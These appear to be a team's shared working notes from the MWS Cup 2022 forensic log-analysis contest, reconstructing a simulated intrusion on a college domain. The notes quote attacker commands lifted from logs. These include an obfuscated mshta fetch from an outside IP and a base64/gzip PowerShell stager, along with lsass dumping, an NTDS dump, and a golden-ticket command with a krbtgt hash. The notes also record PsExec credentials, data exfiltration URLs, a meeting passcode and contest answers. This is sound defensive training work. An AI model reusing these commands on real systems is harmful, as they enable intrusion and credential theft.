# MWS2022 課題4 妹尾です。諸々ありがとうございます。 # お疲れさまでした！！ ありがとうございました～！！！ 惜しいところまでいってる問題もありましたね！ がんばりましょう！！ でわでわ。 ちょっと悔しいです。来年はもうちょっと頑張ります。 - [当日用zoom](https://us04web.zoom.us/j/71172824996?pwd=7Wopk95yryX9NGhDZwdFIMrxsLYisa.1) - ミーティングID: 711 7282 4996 - パスコード: 0pKKMs # 事前情報  [InfoTrace Mark II V3.2 クライアントログ項目一覧](https://scii-my.sharepoint.com/:b:/g/personal/okumura_sana_18_shizuoka_ac_jp/ETaHh-s9v8BGi278WAtob7QBgM5pxucDRghujeMUrbo7Yg?e=1EdOWk) [事前説明資料](https://scii-my.sharepoint.com/:b:/g/personal/okumura_sana_18_shizuoka_ac_jp/EVWtImJBqN1InYyKlX17-L8BWhP87qbCg0e0BqeypP3NmQ?e=cjmlax) [共有フォルダ/Sample_Proxy01.xlsx](https://scii-my.sharepoint.com/:x:/r/personal/okumura_sana_18_shizuoka_ac_jp/_layouts/15/Doc.aspx?sourcedoc=%7BDF73042B-EC16-43B1-8D50-587BF5E644C8%7D&file=Sample_Proxy01.xlsx&action=default&mobileredirect=true) ：事前に提供されたProxy01.logをExcel化したもの [共有フォルダ/Sample_Proxy01_IP_result.txt](https://scii-my.sharepoint.com/personal/okumura_sana_18_shizuoka_ac_jp/_layouts/15/onedrive.aspx?ga=1&id=%2Fpersonal%2Fokumura%5Fsana%5F18%5Fshizuoka%5Fac%5Fjp%2FDocuments%2FLab%2F%E5%AD%A6%E4%BC%9A%2FMWS2022%2F%E8%AA%B2%E9%A1%8C4%2F2022%2F%E5%85%B1%E6%9C%89%E3%83%95%E3%82%A9%E3%83%AB%E3%83%80%2FSample%5FProxy01%5FIP%5Fresult%2Etxt&parent=%2Fpersonal%2Fokumura%5Fsana%5F18%5Fshizuoka%5Fac%5Fjp%2FDocuments%2FLab%2F%E5%AD%A6%E4%BC%9A%2FMWS2022%2F%E8%AA%B2%E9%A1%8C4%2F2022%2F%E5%85%B1%E6%9C%89%E3%83%95%E3%82%A9%E3%83%AB%E3%83%80) ：Sample_Proxy01.logに登場するIPアドレスをipinfo.io で解決したもの --- # 当日 [共有フォルダ](https://scii-my.sharepoint.com/:f:/g/personal/okumura_sana_18_shizuoka_ac_jp/EmAyzEZJMfxCtcXeG9ljNJkBrKzOTdfm_OrChIMShcjeLA?e=h0WhXK) [問題文](https://scii-my.sharepoint.com/:t:/g/personal/okumura_sana_18_shizuoka_ac_jp/EYhmkY7kvb1Iun9wa0tp1SUBjHELsdctsC-ewqSXZmfAyg?e=r94Ts3) ## 0 ### memo senoo: senyol@Senyol-LV:/mnt/c/Users/senyo/Downloads$ sha256sum logs.zip 30df6066bd2e23674d3f6ccd025e9fbe20b4c03a29f6224b4935eea32e31fd02 logs.zip ### ans ## 1.1. Initial Access/Execution　（正解！） ### メモ okumura: 10/05/2022 14:21:02.455 +0900 loc=en-US type=ITM2 sn=69683 lv=5 evt=ps subEvt=start os=Win com="WS02" domain="EDEN-COLLEGE" profile="MWSCup_server" tmid=f32aa9bd-5a1e-4ac1-9a7a-b93a53b88e89 csid=S-1-5-21-2161340801-30039536-1092954500 ip=172.16.1.102,fe80::cc85:1486:78ff:d2d0 mac=06:ad:b5:bf:2d:23 rcCom="DESKTOP" usr="Swan" usrDomain="EDEN-COLLEGE" sessionID=3 psGUID={781B147F-3EC7-4C36-AA59-DC58AB43D4F9} psPath="C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" cmd="""C:\Users\Swan\Desktop\tomatet.xlsm""" psID=4596 parentGUID={43D9F4CB-EEBC-4E52-84C3-2FD9DFC32850} parentPath="C:\Windows\Explorer.EXE" psUser="Swan" psDomain="EDEN-COLLEGE" arc=x86 sha256=99f2abae7b65f8fef3670b71f4219d52a61ea415a791e201ed959b4ec7c38aca sha1=67e3bcd746798c23302dc823c07f53e8bad06576 md5=98e0dc44fc6c7c4faf22bcb2c69b5cf6 company="Microsoft Corporation" fileDesc="Microsoft Excel" fileVer="16.0.15629.20156" product="Microsoft Office" productVer="16.0.15629.20156" crTime="09/30/2022 16:02:36.623" acTime="09/30/2022 16:02:45.139" moTime="09/30/2022 16:02:45.139" size=49082216 sig=Valid signer="Microsoft Corporation" issuer="Microsoft Code Signing PCA 2010" cerSN="33 00 00 04 90 0e 61 14 98 12 78 23 70 00 00 00 00 04 90" validFrom="05/13/2022 05:47:05.000" validTo="05/12/2023 05:47:05.000" senoo: psGUID={781B147F-3EC7-4C36-AA59-DC58AB43D4F9} psPath="C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" ### 解答 2022/10/05_14:21:02_tomatet.xlsm ## 1.2. Initial Access / Execution1.2（正解！） ### メモ combined.log を検索 cscript なし mshta　　parentPath="C:\Windows\SysWOW64\cmd.exe" ↑これは何行目（何時）でしたか？12764? whoamiを検索 13584行目 10/05/2022 14:27:16.061 ~(略)~ usr="Swan" usrDomain="EDEN-COLLEGE" sessionID=3 psGUID={82243F98-4710-46B0-810A-20BF1658C031} psPath="C:\Windows\system32\whoami.exe" cmd="/all" psID=6972 parentGUID={EC1D8469-8E38-487A-907A-F6634129507B} parentPath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" psUser="Swan" psDomain="EDEN-COLLEGE" parentGUID={781B147F-3EC7-4C36-AA59-DC58AB43D4F9} L.12764 psPath="C:\Windows\SysWOW64\cmd.exe" cmd="/c m^s^h^t^a h^t^t^p:/^/35.77.166.144:8080/se/s.html" ### 解答 mshta ## 1.3. Initial Access/Execution1.3（正解） ### メモ L.12783 cmd="http://35.77.166.144:8080/se/s.html" 　まちがい http://35.77.166.144:8800/se/s.png　　05/Oct/2022:14:22:25　<-これが正解 L.12801　あやしいBase64 10/05/2022 14:21:35.897 → ``` if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''''+''H4sIAF0UPWMCA71Wa2/aSh{0}9Xqn/waos2ZYImEfaJlKla16BBBOIecRQVBl7bRbWXmKvefX2v99ZsANRSJV7pV5LUezdmdnZM2fO4MaBzTANhGmv6y6Fnx8/CMnTs''+''ULLF2RxNW39yAjiYqC2lOOuiO+Fb4I81pbLKvUtHEyurytxGKKAHb6zN4hpUYT8KcEokhXhb2E4QyG6uJ/Okc2En4L4I3t{0}6NQiidm2YtkzJFxogcP3WtS2eGZZY0kwk6Xv3yVlfJGfZGtPsUUiWTK2EUN+1iFEUoRfCj+wt10iWdKxHdKIuiw7xEGxkO0HkeWiNkRbIR2xGXUiCa5yvEyIWBwG/E48yMFEluC1E1Jbc5wQR''+''ZGUEcY8/Hgy+''+''UseJ2c/xAH{0}Pso2A4ZCujRQuMI2irINK3AIek{0}uBLwMFuLAmygKmK3oAsliEBOSEf5NGLm''+''N1ily73WST53AqsNCJQMFfXVLnToxQQc/6Uyaewoo8KQ0APB+cfzcl{0}zs6gxzjgvpM97vIMhX7tAI712/CWpG0OFsi9FwC59iL4yRMnlGWxBX1f4q895o+dQVHP3R4wiWxgOKnckxwIvai4s7bvI2j6vIxQGqbgPLx3ZKVflcQZBL0B6PbGrWhvxkKdlAThUR5FmMg8x58cqt5mP27FuOMXFQqNlQ1AiygnorL5M51E2WmoGOfA{0}v8A1EFV1oEJRaJ02xTU/n32AkVYgVRRmhE0OH2hnBQBZBTkbQgggnW1rM6P5VOqarx4Rh24pYGm6ivAAzObRCg4iFsQ1FBQB6xhLZ2CIcj4zQwA4qbw3spYdLZ9GoWIRA40CkFVQ{0}''+''VjgKBuNUCSHPPS2UrIFY018S5IPNXi/qxPJAHZL22HPL8pAjnU0z7YI{0}5TkqKRwnSUK''+''p{0}UJZRhjgkIH2cIQ5tf5T{0}q9VB5KphCgpjJz21ri8ZZz+or/h/Ezg2YMRMgCiHlK/bEXoc+mgL/Kn3{0}2uaPCYzY{0}odnmB89oa''+''55s6/PVxsUmrX5y723kjF1Y3M1drRk290al2G43S6tYYlJhRa7K7TpPptcf53NAa{0}32TjZpao4fVhVnaLW/xzmhpjrnJfd6Vd''+''2u1vNnNPcc1q67rfXGNh/xlHbeGlW5ZLVitai1u{0}cvrslqKanjd6OJ+d3F''+''bZ1NzQKy+m/Me81cW3rTC+S{0}/pJmFeuRB4vUy1U22muVygzhXyVMyosvl8Cpwc4OONvpagRuUGv16rNo927960uq''+''dXP6xvHIKg61dmJHpzd''+''oz+gPzrnZJnG2+Y0JJzGLX6/''+''mgWcQh5qIdWcNB7FQW8ejmqjj1Nytz+NBzGrfLqW/T28JMdRra59b2665tlIrt''+''bWnTnpux3uuq93OvpFe1lV3or+zt5Rrsg7uu9u0TlGvcxwErFiai583''+''WOy5oHz+IzuNJ1d6Sat0Ko5lFoJqgwmk/1WlYT3S1QzH3kOX{0}cF6gMEA''+''EBhqMvJSLGiHU5rIOEgw{0}5S{0}zfOr0m/ukzr0pwrOhcpT7dOn6egRJcopvsi0UeGyWUTdFVQWZVjdqaU/h91+sQpdbGUJluMw{0}Ko''+''e4ZB8XQmFXkOX/ASYY5Axk5S2g3sIMjl6ACoAoHXqTI1emlJzitr/UMweOoAFaebjzmI/vAzXA/QI9CSLjA+50''+''YIqb/B9mSyIwM/jn/J4tx7Xf7L6LQWqGQ/Nq8eXCiSr/yfsPLczA1AChJOgwts/BkPTHSXE3eWC/mzz8R+x9zC7a8MNoL9P/AHE/BfU+CwAA'')-f''D'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); ``` - 圧縮→base64 ### 解答 L.13015　10/05/2022 14:22:11.815 http://35.77.166.144:8800/se/s.png　　 05/Oct/2022:14:22:25 L.13070 ssl.dll evt=file subEvt=create L.13207　10/05/2022 14:22:36.402 psGUID={D69FE13D-03BE-40AC-907D-81055CD394A6} psPath="C:\Windows\SysWOW64\cmd.exe" cmd="/c C:\Windows\System32\rundll32.exe C:\Users\Public\Documents\ssl.dll,StartW" psID=4848 parentGUID={FBE557B0-D97C-4CD7-884C-07847EC3BA57} L.13217　10/05/2022 14:22:41.789 psGUID={51275CDA-E23A-4E11-82C7-BA0B27500C0A} psPath="C:\Windows\SysWOW64\rundll32.exe" cmd="C:\Users\Public\Documents\ssl.dll,StartW" ## 1.4 ### メモ L.13032　10/05/2022 14:22:17.468 L.13069　10/05/2022 14:22:25.541 dstIP=35.77.166.144 dstPort=8800 [05/Oct/2022:14:22:27 +0900] "GET http://35.77.166.144:8800/login/7afda21s HTTP/1.1" 200 58 17412032 "-" "-" TCP_MISS:ORIGINAL_DST http://35.77.166.144:8800/login/7afda21s_C:\Users\Swan\AppData\Local\Temp\3\__PSScriptPolicyTest_rodabr2k.u0c.ps1 ### 解答 http://35.77.166.144:8800/login/7afda21s_C:\Users\Swan\AppData\Local\Temp\3\__PSScriptPolicyTest_rodabr2k.u0c.ps1 ## 1.5 ### メモ ### 解答 C:\Windows\SysWOW64\rundll32.exe C:\Users\Public\Documents\ssl.dll,StartW C:\Windows\SysWOW64\cmd.exe /c C:\Windows\System32\rundll32.exe C:\Users\Public\Documents\ssl.dll,StartW ## 1.6. Initial Access/Execution　（正解！） ### メモ　複数ある Proxy Log　05/Oct/2022:14:22:56 +0900 CONNECT 40.79.141.153:443 CONNECT 35.77.166.144:443 などではないかな？ 35.77.166.144:443 ### 解答 #2 ## 2.1 ### メモ L.19636 10/05/2022 15:19:36.370 @DC01 psPath="C:\Windows\system32\ntdsutil.exe" cmd="""ac i ntds"" ifm ""create full $env:TEMP\dump"" q q" psID=5084 parentGUID={78D41D73-4D15-432F-9026-112E8A18DD42} parentPath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" psUser="SYSTEM" ntdsutil L. 21085　　10/05/2022 15:28:28.798　＠WS02 psPath="C:\Users\Swan\AppData\Local\Temp\m2.exe" cmd="""kerberos::golden /user:Henderson /domain:eden-college.local /sid:S-1-5-21-2546957783-168664247-474269456 /krbtgt:e3f41a65bddff59e84d4d9b9290e32ef /ptt"" ### 解答 ## 2.2 ### メモ 検索：Get-WmiObject L:4309(sn=56743) ``` 10/05/2022 14:15:36.028 +0900 loc=en-US type=ITM2 sn=56743 lv=5 evt=ps subEvt=start os=Win com="DC01" domain="EDEN-COLLEGE" profile="MWSCup_server" tmid=f02cca14-4aae-402b-a8d9-2a2873957095 csid=S-1-5-21-1720067203-2924128797-2708492278 ip=172.16.2.101,fe80::74c9:7795:eb11:ce0 mac=06:00:f2:4b:34:cd sessionID=0 psGUID={D2EE4049-C95C-42B1-8C48-6C74B36A2A62} psPath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd=""" [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 Get-WmiObject -Class win32_quickfixengineering | Select-Object HotFixId,Description,@{l=\""InstalledTime\"";e={[DateTime]::Parse($_.psbase.properties[\""installedon\""].value,$([System.Globalization.CultureInfo]::GetCultureInfo(\""en-US\""))).ToUniversalTime().ToString(\""yyyy-MM-ddTHH:mm:ssZ\"")}},InstalledBy | sort InstalledTime -desc | ConvertTo-Json""" psID=2448 parentGUID={82396C28-7B72-40E1-A807-820535BF1CA4} parentPath="C:\Program Files\Amazon\SSM\ssm-document-worker.exe" psUser="SYSTEM" psDomain="NT AUTHORITY" arc=x64 sha256=de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c sha1=6cbce4a295c163791b60fc23d285e6d84f28ee4c md5=7353f60b1739074eb17c5f4dddefe239 company="Microsoft Corporation" copyright="© Microsoft Corporation. All rights reserved." fileDesc="Windows PowerShell" fileVer="10.0.17763.1 (WinBuild.160101.0800)" product="Microsoft® Windows® Operating System" productVer="10.0.17763.1" crTime="09/15/2018 16:14:14.454" acTime="09/15/2018 16:14:14.454" moTime="09/15/2018 16:14:14.454" size=448000 sig=Valid signer="Microsoft Windows" issuer="Microsoft Windows Production PCA 2011" cerSN="33 00 00 01 c4 22 b2 f7 9b 79 3d ac b2 00 00 00 00 01 c4" validFrom="07/04/2018 05:45:50.000" validTo="07/27/2019 05:45:50.000" ``` とても怪しい L:4473(sn=56902) ``` 10/05/2022 14:15:46.390 +0900 loc=en-US type=ITM2 sn=56902 lv=5 evt=ps subEvt=start os=Win com="DC01" domain="EDEN-COLLEGE" profile="MWSCup_server" tmid=f02cca14-4aae-402b-a8d9-2a2873957095 csid=S-1-5-21-1720067203-2924128797-2708492278 ip=172.16.2.101,fe80::74c9:7795:eb11:ce0 mac=06:00:f2:4b:34:cd sessionID=0 psGUID={513B7A8B-C89E-48B8-A381-908B80A6EF97} psPath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd=""" $wmi_proc = Get-WmiObject -Class Win32_Processor if (@($wmi_proc)[0].NumberOfCores) #Modern OS { $Sockets = @($wmi_proc).Count $Cores = ($wmi_proc | Measure-Object -Property NumberOfCores -Sum).Sum $CPUs = ($wmi_proc | Measure-Object -Property NumberOfLogicalProcessors -Sum).Sum } else #Legacy OS { $Sockets = @($wmi_proc | Select-Object -Property SocketDesignation -Unique).Count $Cores = @($wmi_proc).Count $CPUs=$Cores } $CPUModel=@($wmi_proc)[0].Name $CPUSpeed=@($wmi_proc)[0].MaxClockSpeed if ($Cores -lt $CPUs) { $Hyperthread=\""true\"" } else { $Hyperthread=\""false\"" } Write-Host -nonewline @\"" {\""CPUModel\"":\""$CPUModel\"",\""CPUSpeedMHz\"":\""$CPUSpeed\"",\""CPUs\"":\""$CPUs\"",\""CPUSockets\"":\""$Sockets\"",\""CPUCores\"":\""$Cores\"",\""CPUHyperThreadEnabled\"":\""$HyperThread\""} \""@ """ psID=4348 parentGUID={82396C28-7B72-40E1-A807-820535BF1CA4} parentPath="C:\Program Files\Amazon\SSM\ssm-document-worker.exe" psUser="SYSTEM" psDomain="NT AUTHORITY" arc=x64 sha256=de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c sha1=6cbce4a295c163791b60fc23d285e6d84f28ee4c md5=7353f60b1739074eb17c5f4dddefe239 company="Microsoft Corporation" copyright="© Microsoft Corporation. All rights reserved." fileDesc="Windows PowerShell" fileVer="10.0.17763.1 (WinBuild.160101.0800)" product="Microsoft® Windows® Operating System" productVer="10.0.17763.1" crTime="09/15/2018 16:14:14.454" acTime="09/15/2018 16:14:14.454" moTime="09/15/2018 16:14:14.454" size=448000 sig=Valid signer="Microsoft Windows" issuer="Microsoft Windows Production PCA 2011" cerSN="33 00 00 01 c4 22 b2 f7 9b 79 3d ac b2 00 00 00 00 01 c4" validFrom="07/04/2018 05:45:50.000" validTo="07/27/2019 05:45:50.000” ``` ### 解答 NG:sn=56902 #3 ## 3.1 ### メモ ### 解答 ## 3.2 ### メモ 10/05/2022 14:51:01.601 +0900 loc=en-US type=ITM2 sn=72810 lv=6 alert=1163 alertClass=risk rs=31 trs=429 rf=C34:L29:R29 evt=ps subEvt=start os=Win com="WS02" domain="EDEN-COLLEGE" profile="MWSCup_server" tmid=f32aa9bd-5a1e-4ac1-9a7a-b93a53b88e89 csid=S-1-5-21-2161340801-30039536-1092954500 ip=172.16.1.102,fe80::cc85:1486:78ff:d2d0 mac=06:ad:b5:bf:2d:23 rcCom="DESKTOP" usr="Swan" usrDomain="EDEN-COLLEGE" sessionID=3 psGUID={BE3D8FF5-0FCB-47FB-A8AF-FE591DDD411C} psPath="C:\Windows\System32\rundll32.exe" cmd="C:\Windows\System32\comsvcs.dll MiniDump 728 C:\Users\Swan\AppData\Local\Temp\lsass.dmp full" ### 解答 [後付けで書いてます]ここの問題ではないかもしれないけれど、MITRE ATTACKの T1003.001の問題、これかも #4 ## 4.1. Lateral Movement（正解！） ### 問題 WS02では、C:\Users\Swan\AppData\Local\Temp\pe.exe という実行ファイルが作られている。 このファイルは、以下のうちどのような実行ファイルであると推測されるか?（選択問題） - Ransomware - Key Logger - Password Dump Tool - Microsoftの正規ファイル ### メモ あれ？ 問題／答えなんだったっけ？ ### 解答 ## 4.2. Lateral Movement（正解！） ### メモ L.17929　 psPath="C:\Users\Swan\AppData\Local\Temp\pe.exe" cmd="-accepteula -u eden -p stellastar \\dc01.eden-college.local -s -c C:\Users\Swan\AppData\Local\Temp\attach.exe" →DC01 ### 解答 DC01_stellastar #5 ##5 ### メモ ### 解答 ## 6.1 henderson_e3f41a65bddff59e84d4d9b9290e32ef administrator_e3f41a65bddff59e84d4d9b9290e32ef krbtgt‗e3f41a65bddff59e84d4d9b9290e32ef　<- これだったかも… ## 6.2　 https://www.manageengine.jp/solutions/active_directory_security/lp/column001.html さらに、「Active Directoryへの攻撃を検知した場合に必要な緊急対処方法」も参考になるだろう。「パッチを適用しても、1度発行されたGolden Ticketが無効になるわけではない点に注意が必要。また、Golden Ticketを無効化するために、krbtgtアカウントのパスワード変更は連続して2回行う必要があるなど、見落とされがちなところも本書に記載してある」（松田氏）。 https://www.jpcert.or.jp/research/AD_report_20170314.pdf メモリ上にTicketがキャッシュされているため、Golden Ticket を使った攻撃を抑止するために、krbtgt という DC 上のビ ルトインサービスアカウントのパスワードを 2 回連続で変更する必要がある。 ### 回答　 X=2 【理由】 メモリ上にTicketがキャッシュされているため、Golden Ticket を使った攻撃を抑止するために、krbtgt という DC 上のビルトインサービスアカウントのパスワードを 2 回連続で変更する必要がある。 【参考】 https://www.jpcert.or.jp/research/AD_report_20170314.pdf ## 7　 FILE01上の以下のファイルをWS02にコピーし、 以下のURLに送信している。 student_grades.xlsx student_list.xlsx entrance_exam.docx Proxy01.log:5932　http://35.76.102.7/bucket/student_grades.xlsx Proxy01.log:5990 http://35.76.102.7/bucket/student_list.xlsx Proxy01.log:6009 http://35.76.102.7/bucket/entrance_exam.docx ## 8.1 ### 問題 攻撃者によってアクセスがあったシステムを以下からすべて選択し、その番号を列挙せよ。（記述問題） 1. WS01 2. WS02 3. WS03 4. DC01 5. FILE01 回答は何回でも提出可能です。一番最後に提出された回答を採点します。 ### ans 2,4,5 ## **8.2. Incident Response** ### 問題 攻撃者が悪用したアカウントを以下からすべて選択し、その番号を列挙せよ。（記述問題） 1. henderson 2. swan 3. evans 4. eden 回答は何回でも提出可能です。一番最後に提出された回答を採点します。 ### memo 1,2,4 だったっけ？ 一応メモメモ evans 以外 ### ans 1,2,4